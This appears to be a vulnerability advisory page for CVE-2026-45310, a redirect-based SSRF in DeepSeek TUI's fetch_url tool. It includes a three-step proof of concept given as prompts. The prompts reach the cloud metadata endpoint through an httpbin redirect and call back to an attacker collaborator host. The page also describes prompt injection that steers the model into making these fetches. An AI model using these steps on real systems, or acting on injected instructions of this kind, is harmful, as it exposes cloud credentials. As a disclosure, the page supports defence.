Skip to main content

DeepSeek TUI CVE-2026-45310

| EUVDEUVD-2026-32964 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-14 https://github.com/Hmbown/DeepSeek-TUI GHSA-96ff-gc8g-wpvg
7.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.4 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 22:02 vuln.today
Analysis Generated
May 14, 2026 - 22:02 vuln.today
CVE Published
May 14, 2026 - 20:29 nvd
HIGH 7.4

DescriptionGitHub Advisory

Summary

The fetch_url tool validates the initial URL's resolved IP address against a restricted-IP blocklist (is_restricted_ip()) to prevent SSRF attacks against internal services (cloud metadata endpoints, localhost, private networks). However, the HTTP client (reqwest) is configured to automatically follow up to 5 redirects (reqwest::redirect::Policy::limited(5)) without re-validating the redirect target against the same SSRF protections.

PoC

Step 1 - Baseline: Confirm fetch_url blocks direct requests to restricted IPs.

Prompt: use fetch_url to fetch http://169.254.169.254/latest/meta-data/
Expected: Error - "restricted address (private/loopback/link-local)"

Step 2 - SSRF bypass via redirect: Fetch a public URL that redirects to the restricted IP.

Prompt: use fetch_url to fetch http://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/&status_code=302

Expected result: The error message says "connection refused" or "request failed: connect error" - NOT "restricted address." This proves the SSRF filter was bypassed; the connection failed only because 169.254.169.254 is unreachable from a non-cloud machine.

Observed result: fetch_url followed the 302 redirect and attempted to connect to 169.254.169.254. The error was a TCP-level connection failure, confirming the application-layer SSRF check was not applied to the redirect target.

Step 3 - Redirect to attacker-controlled host: Confirm attacker-controlled redirect targets are followed.

Prompt: use fetch_url to fetch http://httpbin.org/redirect-to?url=http://[collaborator-domain]/ssrf-redirect-bypass&status_code=302
Expected: Collaborator receives HTTP callback at /ssrf-redirect-bypass, confirming the redirect was followed.

Impact

On cloud-hosted instances (AWS, GCP, Azure), an attacker can exfiltrate cloud IAM credentials, instance metadata, and other sensitive internal service data by redirecting fetch_url to http://169.254.169.254/latest/meta-data/. The attack is triggered via prompt injection (malicious instructions embedded in files or web content the model processes) that cause the model to call fetch_url with an attacker-controlled URL.

AnalysisAI

HTTP redirect bypass in DeepSeek TUI's fetch_url tool allows Server-Side Request Forgery (SSRF) against cloud metadata endpoints and internal services. The tool validates only the initial URL against restricted IP blocklists but automatically follows up to 5 HTTP redirects without re-validation, enabling attackers to exfiltrate AWS/GCP/Azure IAM credentials and instance metadata via prompt injection attacks. Vendor-released patch available in version 0.8.22. No active exploitation confirmed (not in CISA KEV), but detailed proof-of-concept exists in public advisory demonstrating successful bypass of SSRF protections.

Technical ContextAI

DeepSeek TUI is a terminal user interface for DeepSeek AI models distributed as Rust (deepseek-tui, deepseek-tui-cli) and npm (deepseek-tui) packages. The vulnerability exists in the fetch_url tool's HTTP client implementation using Rust's reqwest library with redirect policy set to limited(5). The tool implements CWE-918 (Server-Side Request Forgery) protections via is_restricted_ip() function to block requests to RFC1918 private addresses, loopback interfaces, and link-local addresses including 169.254.169.254 (cloud metadata endpoint). However, the reqwest client's automatic redirect handling bypasses this validation layer-only the initial URL undergoes SSRF checks, while redirect targets (HTTP 301/302/307/308 responses) are followed without IP address re-validation. This architectural flaw creates a classic Time-of-Check-Time-of-Use (TOCTOU) vulnerability where the security decision is made against the initial URL but the actual network request targets the redirected destination.

RemediationAI

Upgrade immediately to DeepSeek TUI version 0.8.22 or later, which implements redirect target validation against the same SSRF blocklist applied to initial URLs. Installation methods: npm users run 'npm install -g deepseek-tui@latest' to update both binaries automatically; Cargo users run 'cargo install deepseek-tui-cli deepseek-tui --locked --force' to reinstall both required packages; Docker users pull 'ghcr.io/hmbown/deepseek-tui:v0.8.22' or 'ghcr.io/hmbown/deepseek-tui:latest'; manual installation requires downloading both platform-specific binaries from the v0.8.22 release at https://github.com/Hmbown/DeepSeek-TUI/releases/tag/v0.8.22 and verifying checksums in deepseek-artifacts-sha256.txt. If immediate patching is not possible, implement network-layer compensating controls: configure egress firewall rules to block outbound connections from DeepSeek TUI processes to 169.254.169.0/16 (cloud metadata), 127.0.0.0/8 (loopback), 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 (RFC1918 private networks)-note this breaks legitimate internal service access and may interfere with tool functionality. Alternatively, run DeepSeek TUI in network-isolated containers with no access to cloud metadata endpoints or internal networks, though this limits the fetch_url tool's utility. Apply prompt injection defenses: sanitize or restrict AI model inputs from untrusted sources, implement allowlists for fetch_url domains if feasible, and monitor fetch_url invocations for redirect chains or metadata endpoint access attempts. All compensating controls reduce but do not eliminate risk-patching to 0.8.22 remains the only complete mitigation.

Share

CVE-2026-45310 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy